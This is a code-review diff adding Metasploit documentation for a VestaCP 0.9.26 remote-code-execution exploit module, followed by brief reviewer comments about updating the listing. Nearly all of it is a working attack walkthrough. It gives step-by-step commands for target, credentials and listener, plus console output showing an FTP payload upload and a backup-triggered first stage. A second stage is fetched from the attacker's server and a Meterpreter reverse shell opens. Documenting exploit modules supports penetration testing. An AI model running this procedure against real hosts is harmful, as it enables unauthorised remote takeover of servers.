documentation/modules/exploit/linux/http/vestacp_exec.md

```diff
@@ -0,0 +1,84 @@
+2. `use exploit/linux/http/vestacp_exec `
+3. Set `RHOST`
+4. Set `LHOST`
+4. Set `USERNAME`
+4. Set `PASSWORD`
+4. Set `SRVHOST`
+4. Set `SRVPORT`
+7. Run `exploit`
+8. **Verify** that you are seeing `Successfully authenticated to the FTP service` in console.
+9. **Verify** that you are seeing `Successfully uploaded the payload as a file name` in console.
+9. **Verify** that you are seeing `Successfully authenticated to the HTTP Service` in console.
+9. **Verify** that you are seeing `Scheduled backup has ben started. Exploitation may take up to 5 minutes.` in console.
+9. **Verify** that you are seeing `It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...` in console.
+9. **Verify** that you are seeing `First stage is executed ! Sending 2nd stage of the payload` in console.
+15. **Verify** that you are getting meterpreter session.
+
+## Ubuntu 18.04 LTS with VestaCP 0.9.26
+
+```
+msf5 > use exploit/linux/http/vestacp_exec 
+msf5 exploit(linux/http/vestacp_exec) > set RHOSTS 192.168.74.218
+RHOSTS => 192.168.74.218
+msf5 exploit(linux/http/vestacp_exec) > set USERNAME user11
+USERNAME => user11
+msf5 exploit(linux/http/vestacp_exec) > set PASSWORD qwe123
+PASSWORD => qwe123
+msf5 exploit(linux/http/vestacp_exec) > set LHOST 192.168.74.1 
+LHOST => 192.168.74.1
+msf5 exploit(linux/http/vestacp_exec) > set SRVHOST 192.168.74.1 
+SRVHOST => 192.168.74.1
+msf5 exploit(linux/http/vestacp_exec) > set SRVPORT 8081
+SRVPORT => 8081
+msf5 exploit(linux/http/vestacp_exec) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.74.1:4444 
+[*] 192.168.74.218:8083 - Using URL: http://192.168.74.1:8081/jZlIgkU
+[*] 192.168.74.218:8083 - Second payload download URI is http://192.168.74.1:8081/jZlIgkU
+msf5 exploit(linux/http/vestacp_exec) > [+] 192.168.74.218:21 - Successfully authenticated to the FTP service
+[+] 192.168.74.218:21 - Successfully uploaded the payload as a file name
+[*] 192.168.74.218:8083 - Retrieving cookie and csrf token values
+[+] 192.168.74.218:8083 - Cookie and CSRF token values successfully retrieved
+[*] 192.168.74.218:8083 - Authenticating to HTTP Service with given credentials
+[+] 192.168.74.218:8083 - Successfully authenticated to the HTTP Service
+[+] 192.168.74.218:8083 - Scheduled backup has ben started. Exploitation may take up to 5 minutes.
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
+[+] 192.168.74.218:8083 - First stage is executed ! Sending 2nd stage of the payload
+[*] Sending stage (53755 bytes) to 192.168.74.218
+[*] Meterpreter session 1 opened (192.168.74.1:4444 -> 192.168.74.218:35102) at 2020-03-18 17:45:30 +0300
+[-] 192.168.74.218:8083 - Exploit aborted due to failure: unknown: Something went wrong. Maybe session timed out ?
```

Comment:
Hmm seems like you updated the exploit but you didn't update the documentation. Can you update the listing in this documentation to reflect your changes? Think in the comment you showed that this line wasn't appearing any more so the documentation should reflect this :)

Reply:
Upss 😇

Reply:
Confirmed fixed, looks like a nice clean copy of the documentation now!